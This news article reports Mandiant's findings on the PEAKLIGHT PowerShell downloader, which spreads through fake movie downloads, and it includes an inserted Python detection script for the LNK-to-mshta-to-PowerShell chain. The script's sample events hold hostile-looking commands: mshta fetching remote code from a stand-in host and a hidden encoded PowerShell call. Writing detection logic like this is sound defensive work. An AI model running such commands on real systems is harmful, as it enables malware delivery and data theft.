
New PEAKLIGHT Dropper utilized in cyber attacks targeting Windows systems through malicious movie downloads.

Cybersecurity researchers have discovered a new dropper that acts as a gateway to deploy advanced malware on Windows systems with the aim of stealing information and loading malicious programs.

“This dropper operates in memory and runs a PowerShell-based downloader,” mentioned Google-owned Mandiant in a statement. “The PowerShell-based downloader is known as PEAKLIGHT.”

Various malware families, such as Lumma Stealer, Hijack Loader (also called DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, are being distributed using this method, all of them available under the malware-as-a-service (MaaS) model.

The attack chain begins with a Windows shortcut (LNK) file obtained through drive-by download tactics, for example when users search for movies on search engines. It’s important to note that these LNK files are hidden within ZIP archives disguised as pirated movies.

The LNK file connects to a content delivery network (CDN) hosting a hidden memory-only JavaScript dropper. This dropper then runs the PEAKLIGHT PowerShell downloader script on the system to communicate with a command-and-control (C2) server for additional payloads.

Mandiant has found various versions of the LNK files, some using asterisks (*) as wildcards to execute the legitimate mshta.exe binary and discreetly run malicious code (i.e., the dropper) fetched from a remote server.

Additionally, the droppers contain hex-encoded and Base64-encoded PowerShell payloads that are decoded to run PEAKLIGHT, which then delivers advanced malware to the compromised system while also downloading a legitimate movie trailer, likely as a diversion.
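As an added illustration of how a defender might hunt for this chain in process-creation telemetry (example code written for this page, not Mandiant's or the article's own; the Sysmon-style event fields and sample command lines are constructed, and the heuristics are assumptions rather than published indicators):

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style; sample data, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\msh*.exe" https://cdn.invalid/stage1.hta'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     # constructed encoded argument, not a real payload
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
    {"Image": r"C:\Program Files\Example\updater.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Example\updater.exe" --check'},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
ENC_FLAG_RE = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)(?:\s|$)", re.IGNORECASE)
# long Base64-looking or hex-looking runs, the encodings the article says the droppers carry
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}|(?:[0-9A-Fa-f]{2}){20,}")


def score_event(ev):
    """Return the reasons an event resembles the LNK -> mshta.exe -> PowerShell chain."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    reasons = []
    if image.endswith("mshta.exe"):
        # First token is the program path as launched; the LNK variants use '*' wildcards there.
        launched_as = cmd.split()[0] if cmd.split() else ""
        if "*" in launched_as:
            reasons.append("mshta_wildcard_path")
        if URL_RE.search(cmd):
            reasons.append("mshta_remote_url")
    if image.endswith("powershell.exe") or image.endswith("pwsh.exe"):
        if parent.endswith("mshta.exe"):
            reasons.append("powershell_child_of_mshta")
        if ENC_FLAG_RE.search(cmd):
            reasons.append("powershell_encoded_command")
        if BLOB_RE.search(cmd):
            reasons.append("powershell_encoded_blob")
    return reasons


def triage(events):
    """Map event index -> reasons for every event that tripped at least one check."""
    return {i: r for i, ev in enumerate(events) if (r := score_event(ev))}


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", ", ".join(reasons))
```

The heuristics trade precision for coverage; in production, pair them with the hardcoded file paths and CDN hosts from the vendor report rather than relying on the generic patterns alone.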

“PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain checking for ZIP archives in hardcoded file paths,” explained Mandiant researchers Aaron Lee and Praveeth D’Souza.

“If the archives are not present, the downloader will connect to a CDN site, download the remotely hosted archive file, and save it on the system.”

This revelation coincides with Malwarebytes’ explanation of a malvertising campaign using fake Google Search ads for Slack to redirect users to malicious sites hosting harmful installers that result in deploying a remote access trojan named SectopRAT.
